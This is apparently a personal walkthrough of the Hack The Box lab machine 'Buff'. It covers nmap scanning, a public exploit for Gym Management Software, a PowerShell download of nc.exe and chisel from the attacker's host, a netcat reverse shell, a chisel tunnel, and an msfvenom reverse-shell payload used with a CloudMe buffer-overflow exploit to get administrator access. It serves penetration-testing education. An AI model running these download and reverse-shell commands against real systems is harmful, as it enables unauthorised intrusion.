Buff

It's time for another Windows machine from Hack the box! As usual I'm going to skip the struggle and only write the steps that lead somewhere! Let's start off with creating nmap/ folder and after that running nmap:

mkdir nmap
sudo nmap -sC -sV -oA nmap/ -T4  10.129.2.18

nmap-buff

Port 8080 seems to be serving some kind of Web-application.. Let's check that out! After navigating the pages little I stumbled upon the contact-page and found out that the application is made using "Gym Management Software 1.0"

buff-webapp

It seemed a good time to do some googling about this software and I found an exploit on exploit-db! Let's test that out! Simply copy the code on your machine, save it as exploit.py and run it by executing:

python exploit.py http://10.129.2.18:8080/

We have some cool looking webshell on our hands!

gym-software-exploit

The problem with this shell is that we can't navigate in the file system since we don't actually have a shell session but just a pipe that executes one command at the time. Let's upload Netcat to the server for a better shell! To achieve that, we need to first download Netcat on our local machine, and then starting python http-server to serve that file

python3 -m http.server

After that is done, let's download the file with out web shell:

echo IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.98:8001/nc.exe', 'nc.exe') | powershell 

I know it's not the most subtle and elegant way since we get some kind of error after downloading, but whatever, it works so good enough for now! Next, let's start netcat listener on our local machine:

nc -lnvp 9002

And then on our web shell:

nc.exe 10.10.14.98 9002 -e cmd.exe

Now we have a real shell and can explore the system much better! It seems like we are running as user shaun so let's navigate to his home folder.

cd \Users\shaun

On Downloads-folder there seems to be CloudMe_1112.exe. Once again like a real script kiddie I started googling about what the fuck that software is all about and found out that It's some kind of storage service which runs on port 8888 by default. Running

tasklist

We can see that CloudMe is running! After some more Googling i found an exploit for it! It look's like a pretty simple buffer overflow vulnerability. Let's download the exploit and save it as "privesc.py". Using this exploit requires python on server which we don't have so It's time to use chisel so we can run the exploit on our local machine and access the server!

Let's upload chisel.exe to the server

echo IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.98:8001/chisel.exe', 'chisel.exe') | powershell   

After, setup chisel server on our LOCAL machine:

./chisel server -p 8005 -reverse -v

And finally, execute chisel.exe on TARGET machine:

chisel.exe client 10.10.14.98:8005 R:1337:127.0.0.1:8888 &

I'm not going to details how chisel works but basically now all traffic that goes to localhost:1337 goes through our target and we can access the Cloudme app on port 8888!

Before we run the script we need to setup a payload and modify the script a little bit. We can generate it with msfvenom:

 msfvenom -a x86 -p  windows/shell_reverse_tcp LHOST=10.10.14.98 LPORT=9005  -b '\x00\x0A\x0D' -f py 

Note: Make sure to include those bad charecter (b-flag) or otherwise the payload will not work! Next, copy the generated shellcode and replace the payload on script with it! Don't forget to rename buf-variable to payload! After that we need to change the port from 888 to 1337 since we are tunneling through chisel!

Next, let's setup another Netcat listener, this time on port 9005:

nc -lnvp 9005

Now, run the privesc exploit!

python3 privesc.py

rooted-buff

Pretty fun box atleast for me! Not too much Windows specific shit which is always a plus!